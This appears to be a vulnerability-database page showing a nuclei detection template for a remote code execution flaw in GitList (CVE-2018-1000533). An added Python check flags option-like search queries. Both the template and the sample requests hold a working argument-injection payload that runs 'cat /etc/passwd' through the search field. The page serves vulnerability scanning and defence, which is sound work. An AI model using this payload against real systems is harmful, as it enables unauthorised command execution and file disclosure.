GitList < 0.6.0 Remote Code Execution

Published: 03 Jul 2026 13:39:16
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com
Views: 84

GitList < 0.6.0 Remote Code Execution, vulnerability allows remote code execution via searchTree functio

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2018-1000533 | 6 Jul 2018 19:46 | circl |
| Check Point Advisories | GitList Remote Code Execution (CVE-2018-1000533) | 28 Nov 2021 00:00 | checkpoint_advisories |
| CVE | CVE-2018-1000533 | 26 Jun 2018 16:00 | cve |
| Cvelist | CVE-2018-1000533 | 26 Jun 2018 16:00 | cvelist |
| Metasploit | GitList v0.6.0 Argument Injection Vulnerability | 3 Jul 2018 19:27 | metasploit |
| NVD | CVE-2018-1000533 | 26 Jun 2018 16:29 | nvd |
| Prion | Design/Logic Flaw | 26 Jun 2018 16:29 | prion |

id: CVE-2018-1000533

info:
  name: GitList < 0.6.0 Remote Code Execution
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
    - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
    - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20
    epss-score: 0.72967
    epss-percentile: 0.99382
    cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: gitlist
    product: gitlist
    shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist"
  tags: cve,cve2018,git,gitlist,vulhub,rce,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        query=--open-files-in-pager=cat%20/etc/passwd

    matchers:
      - type: word
        part: body
        words:
          - "root:/root:/bin/bash"

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
          - '<span class="name">(.*?)</span>'
        internal: true
        part: body
# digest: 4a0a0047304502202d6ad8dd55450c7a238500bf49a6e85c2d6307f7101ccabb6be109501b29dd56022100ac0de7b817db979d6e472fbcd6b7c05f26830484c165758ab0ec559c792c13bc:922c64590222798bb761d5b6d8e72950
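
The following is an added example, not part of the template or of GitList's own code: a Python check that flags search requests whose `query` field begins with a dash, which is the shape of the request the template sends. The route pattern, function names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: the search route ends in /tree/<branch>/search, as in the template above.
SEARCH_ROUTE = re.compile(r"/tree/.+/search/?$")


def is_option_like(value: str) -> bool:
    """True when a search term starts with '-' and could be parsed as an option."""
    return value.lstrip().startswith("-")


def flag_request(raw: str) -> list[str]:
    """Return decoded 'query' values of a raw HTTP request that look like options."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return []
    path = request_line[1].split("?", 1)[0]
    if not SEARCH_ROUTE.search(path):
        return []
    # parse_qs percent-decodes and maps '+' to a space, so %2d-encoded dashes are caught.
    fields = parse_qs(body.strip(), keep_blank_values=True)
    return [v for v in fields.get("query", []) if is_option_like(v)]


# Constructed sample requests (not captured traffic); host and repo name are placeholders.
SAMPLES = {
    "template_probe": (
        "POST /example/tree/a/search HTTP/1.1\nHost: gitlist.example\n"
        "Content-Type: application/x-www-form-urlencoded\n\n"
        "query=--open-files-in-pager=cat%20/etc/passwd"
    ),
    "encoded_dash": (
        "POST /example/tree/a/search HTTP/1.1\nHost: gitlist.example\n\n"
        "query=%2D%2Dopen-files-in-pager=cat%20/etc/passwd"
    ),
    "normal_search": (
        "POST /example/tree/master/search HTTP/1.1\nHost: gitlist.example\n\n"
        "query=TODO+fix-me"
    ),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {flag_request(raw)}")
```

Access logs usually omit POST bodies, so a check like this belongs where the body is visible, such as a reverse proxy, WAF rule or application middleware.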

04 Feb 2026 07:00 (current)
Vulners AI Score: 7.5 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.72967